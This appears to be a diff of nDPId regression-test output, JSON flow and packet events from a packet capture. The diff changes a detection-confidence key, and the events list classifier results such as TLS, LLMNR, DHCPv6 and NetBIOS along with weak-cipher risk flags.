00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1200,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104419061,"flow_last_seen":1470104419061,"flow_idle_time":7580000,"flow_min_l4_payload_len":101,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":101,"flow_avg_l4_payload_len":101,"midstream":1,"thread_ts_msec":1470104419061,"l3_proto":"ip4","src_ip":"31.13.87.1","dst_ip":"192.168.5.16","src_port":443,"dst_port":53578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1200,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1470104419061,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":167,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":167,"pkt_l4_len":133,"thread_ts_msec":1470104419061,"pkt":"ABxCjnAxTF4M6gNlCABFAACZI1ZAAFgGw0IfDVcBwKgFEAG70UpuASLeX6ylxYAYAJ4ivgAAAQEICp0wiHcaDujhFwMDAGCI1MTiGjgHtvACFdJlLWU4Nw2FMu4PdWcz\/2qZKGCdERXjWW+\/VFKnsNQj6agVS5OakWCEMlC4HzCUNHzoAeDAfMWTlTRJFP0wq7r0D4aYTL9j7QTQTC0wsTFBdRQvfIs="} 
-00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1200,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104419061,"flow_last_seen":1470104419061,"flow_idle_time":7580000,"flow_min_l4_payload_len":101,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":101,"flow_avg_l4_payload_len":101,"midstream":1,"thread_ts_msec":1470104419061,"l3_proto":"ip4","src_ip":"31.13.87.1","dst_ip":"192.168.5.16","src_port":443,"dst_port":53578,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1200,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104419061,"flow_last_seen":1470104419061,"flow_idle_time":7580000,"flow_min_l4_payload_len":101,"flow_max_l4_payload_len":101,"flow_tot_l4_payload_len":101,"flow_avg_l4_payload_len":101,"midstream":1,"thread_ts_msec":1470104419061,"l3_proto":"ip4","src_ip":"31.13.87.1","dst_ip":"192.168.5.16","src_port":443,"dst_port":53578,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1201,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":2,"flow_last_seen":1470104419061,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104419061,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0qwZAAEAGU\/fAqAUQHw1XAdFKAbtfrKXFbgEjQ4AQD\/zVtQAAAQEIChoPq9GdMIh3"} 
02035{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1202,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":3,"flow_last_seen":1470104419103,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1223,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1223,"pkt_l4_len":1189,"thread_ts_msec":1470104419103,"pkt":"TF4M6gNlYMVHBbyMCABFAAS5ltxAAEAGY5zAqAUQHw1XAdFKAbtfrKXFbgEjQ4AYEACgIgAAAQEIChoPq\/udMIh3FwMDBIB0Q7hbcg3gGVYTMrb0Tw1ukR9UWDAVBAtnbbvKcZJuPb4APoiSa8Bqy8MZbEZYSbOXsH6FRBiOXgQXR63aPZc\/hbpffrKKNOrKdGE28RcTBjPmf5KXRAiotID0urgwFwaynRtP+jd28hq9wG7na42EI3czkeebegJ7Hfqlh5eZl4Vnp3HXS2vj3pkfDjxrZNE1RoOaEkc+zGmnNTU0pYUiN9oTvOxyCvhMy7fmLDw2wNiIlnohv3qHV8HD46rBGW31Av40VD\/q5qbqM\/qLmRKpL9p4844aHi0K6ueq0ZT6TMs6WDgIPrhbY3XHMcMOatt\/ady86wYTLrgpENkDcutzNwuaAPbT+EcTuorA74M2F\/nruolPShszJ2UqNq\/Kb53\/C73zGS79aq0H4GQVpGLbiCEPEKZelcdnRDWAFlFD1De4jjpnV6eSGf0bsjdHkkSXOtKgo9fVDPltH7d4AfIVmOrYXnB4XaFQ7sqjoXmFP04T\/UZ9alTbXHhky07Nt8ZpZ+IsF6Mw7DMnQdlgdIAyTuc7JHD\/Ok90niXYhq4NzT+82L50EtJnB33J3Hke7h3o3sgTaNpQXdNfC2YJvtxEi753mIKXu+MBZEwy9ZPQaN73qXC\/OuiBukllab3YR64oWLHBb9R9Cob1usnX3xEd01XJDB4TsRXGV\/R4o29fk4M2bIFdhCdZZxbrlSOnlAJcyXFDgvxxi2r1OxtCdDnw2p7YYdruVdteggpuz3KWAxQf0xX6bEO4WvjFfVmqekT\/CcvxbftJ0OPvtUNbAmIMdzByrRWcH1KlE+Vp1L\/hC9R9Bs3ZcFYrVLmIjOjuR6dZM0gvCNqW+59Duv8pYvq5EskshSuV+VZXQgSphi1zRgwOIMQ80OXjfOd22IffY4fDrlfus1x+wyxpIvDhkq\/80yQo8lPgVUp5LrkwFv8MzfZEG9QVTX5NzJ4ld3sKhU430m+NFzViUapPGRtbxukso3sgavTRg8JkLGw0Wu4KmdOfCPycSYYMtX8wKXnZK3VItDYdup7QRof+kXjKmph54jb48oKmkP1E+fFyArD7x9lonAQ9p5aPKUKzZSnZg3s2QTvBrHxZHDUUh\/GiPymMFletcBA29rvJBTe5sh56A9o976AcTzrk2LtWjfifRRuCloaa709oX8j2NbS2T6fnPB7k5F2xcXniikiRI4m5Wr1rKwzBOYPeISDSO0Iag3\/qLAF4MYdHlpTmWSwUwPziE1P5k6JOH5aZI8e0Q7f0ZxLoqs1jZ2iVmphMqYY9PJIQOnlyUxXdzMxGkRPxC7nkXRnaVTa1Jic4cqbBA0o4E1jc9+EGwh1+8Xvom\/2X552fI1RWakGy58LTHqErwe5sAM83mOIz30W4kVNgLTYM0IjNdR3qa8WogmdKAZ3AFlzKnQVYuwcLo1Z88j+7WQ1aASRKMsinZvu7EijyrunTKJR37AcZ28FtpqOjfm2723l5Y4Ue3NHUMyl8JxA0FHtAmvTh7ij
EjAuZW2F1kyMK9I8qLUk6J5HZwZruiDHIIjM="} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1231,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104420438,"flow_last_seen":1470104420438,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1470104420438,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":61172,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1231,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":1470104420438,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":87,"pkt_l4_len":33,"thread_ts_msec":1470104420438,"pkt":"MzMAAQADPKn0WgOEht1gAAAAACERAf6AAAAAAAAAXZJiqOveExn\/AgAAAAAAAAAAAAAAAQAD7vQU6wAh24kTvAAAAAEAAAAAAAAHc29udXNhdgAAAQAB"} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1231,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104420438,"flow_last_seen":1470104420438,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1470104420438,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":61172,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
+00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1231,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104420438,"flow_last_seen":1470104420438,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1470104420438,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":61172,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1232,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":2,"flow_last_seen":1470104420540,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":87,"pkt_l4_len":33,"thread_ts_msec":1470104420540,"pkt":"MzMAAQADPKn0WgOEht1gAAAAACERAf6AAAAAAAAAXZJiqOveExn\/AgAAAAAAAAAAAAAAAQAD7vQU6wAh24kTvAAAAAEAAAAAAAAHc29udXNhdgAAAQAB"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1233,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104420541,"flow_last_seen":1470104420541,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1470104420541,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":59730,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1233,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":115,"flow_packet_id":1,"flow_last_seen":1470104420541,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1470104420541,"pkt":"AQBeAAD8PKn0WgOECABFAAA1H\/gAAAER9C\/AqAPs4AAA\/OlSFOsAIfhUE7wAAAABAAAAAAAAB3NvbnVzYXYAAAEAAQ=="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1233,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104420541,"flow_last_seen":1470104420541,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1470104420541,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":59730,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1233,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104420541,"flow_last_seen":1470104420541,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1470104420541,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":59730,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1234,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1470104420541,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1470104420541,"pkt":"\/\/\/\/\/\/\/\/rCILUFkxCABFAABEAABAAEARLlc7eNDa\/\/\/\/\/8PnB5sAMKByU3Uyb1ZTdDRBQUJIWlc1MGNtbGpaVjlCVUVOZlozVmxjM1FBYldVQQ=="} 00915{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1250,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":2,"flow_last_seen":1470104422079,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":391,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":391,"pkt_l4_len":337,"thread_ts_msec":1470104422079,"pkt":"MzMAAAABwKC7c+tXht1gAAAAAVERgCABsCAABgAAwqC7\/\/5z61f\/AgAAAAAAAAAAAAAAAAAB9gD2AAFRLwf\/D9rVoADAoLtz61cgAbAgAAYAAMKgu\/\/+c+tXAAACACcBREdTLTEyMTAtMTBQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFN3aXRjaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMy4xMC4wMTMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAoLtz61dCMQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFFQMFIxRDkwMDAwMjYAAAAAAAAAAAAAAAAAAAAAAAAAREdTLTEyMTAtMTBQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMCojIz\/\/wAAUG9ydCA4AAAgAbAgAAYAAMKgu\/\/+c+tXQA=="} 
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1270,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104423202,"flow_last_seen":1470104423202,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1470104423202,"l3_proto":"ip6","src_ip":"fe80::f65c:89ff:fe89:e607","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1270,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":1,"flow_last_seen":1470104423202,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":98,"pkt_l4_len":44,"thread_ts_msec":1470104423202,"pkt":"MzMAAQAC9FyJieYHht1gD8\/5ACwRAf6AAAAAAAAA9lyJ\/\/6J5gf\/AgAAAAAAAAAAAAAAAQACAiICIwAsGIELuXYqAAEADgABAAEeo3uS9FyJieYHAAYABAAXABgACAAC\/\/8="} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1270,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104423202,"flow_last_seen":1470104423202,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1470104423202,"l3_proto":"ip6","src_ip":"fe80::f65c:89ff:fe89:e607","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} 
+00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1270,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104423202,"flow_last_seen":1470104423202,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1470104423202,"l3_proto":"ip6","src_ip":"fe80::f65c:89ff:fe89:e607","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1271,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104423246,"flow_last_seen":1470104423246,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104423246,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53629,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1271,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1470104423246,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104423246,"pkt":"ABAj4ACgYMVHBbyMCABFAABAVdFAAEAG6zrAqAUQwKhzS9F9AbtloPklAAAAALAC\/\/81IwAAAgQFtAEDAwUBAQgKGg+8HwAAAAAEAgAA"} 
00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1272,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":2,"flow_last_seen":1470104423247,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104423247,"pkt":"ABxCjnAxABAj4ACgCABFAAA0AABAAEAGQRjAqHNLwKgFEAG70X2C0DtLZaD5JoASFtBuaQAAAgQFtAEBBAIBAwMH"} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1273,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":3,"flow_last_seen":1470104423247,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104423247,"pkt":"ABAj4ACgYMVHBbyMCABFAAAoVNRAAEAG7E\/AqAUQwKhzS9F9AbtloPkmgtA7TFAQIACmCwAAUC8xLjEN"} -00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1274,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104423246,"flow_last_seen":1470104423248,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1470104423248,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53629,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01097{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1276,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104423246,"flow_last_seen":1470104423251,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":374,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1470104423251,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53629,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} +00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1274,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104423246,"flow_last_seen":1470104423248,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1470104423248,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53629,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01097{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1276,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104423246,"flow_last_seen":1470104423251,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":374,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1470104423251,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53629,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1318,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104424738,"flow_last_seen":1470104424738,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104424738,"l3_proto":"ip4","src_ip":"192.168.0.104","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1318,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":1470104424738,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1470104424738,"pkt":"\/\/\/\/\/\/\/\/AAwpjO\/4CABFAABOZ6MAAIARUUPAqABowKj\/\/wCJAIkAOgIy8PkBEAABAAAAAAAAIEZERURDT0VCRkNGQ0VCRU9FREVCRkNDT0VQRkNFSEFBAAAgAAE="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1318,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104424738,"flow_last_seen":1470104424738,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104424738,"l3_proto":"ip4","src_ip":"192.168.0.104","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1318,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104424738,"flow_last_seen":1470104424738,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104424738,"l3_proto":"ip4","src_ip":"192.168.0.104","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1325,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":2,"flow_last_seen":1470104425455,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1470104425455,"pkt":"\/\/\/\/\/\/\/\/AAwpjO\/4CABFAABOZ6QAAIARUULAqABowKj\/\/wCJAIkAOgIy8PkBEAABAAAAAAAAIEZERURDT0VCRkNGQ0VCRU9FREVCRkNDT0VQRkNFSEFBAAAgAAE="} 00878{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1329,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1470104425762,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":359,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":359,"pkt_l4_len":325,"thread_ts_msec":1470104425762,"pkt":"\/\/\/\/\/\/\/\/wKC7c+snCABFAAFZOwBAAEARM+XAqAoH\/\/\/\/\/\/YA9gABRUMe\/\/+fLaAAwKC7c+snwKgKBwAAAgAnAURHUy0xMjEwLTEwUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABTd2l0Y2gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADMuMTAuMDEzAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwKC7c+snQjEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABRUDBSMUQ5MDAwMDIzAAAAAAAAAAAAAAAAAAAAAAAAAERHUy0xMjEwLTEwUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAqAoH\/\/8AAFBvcnQgOAAAAAAAAAAAAAAAAAAAAAAAAAA="} 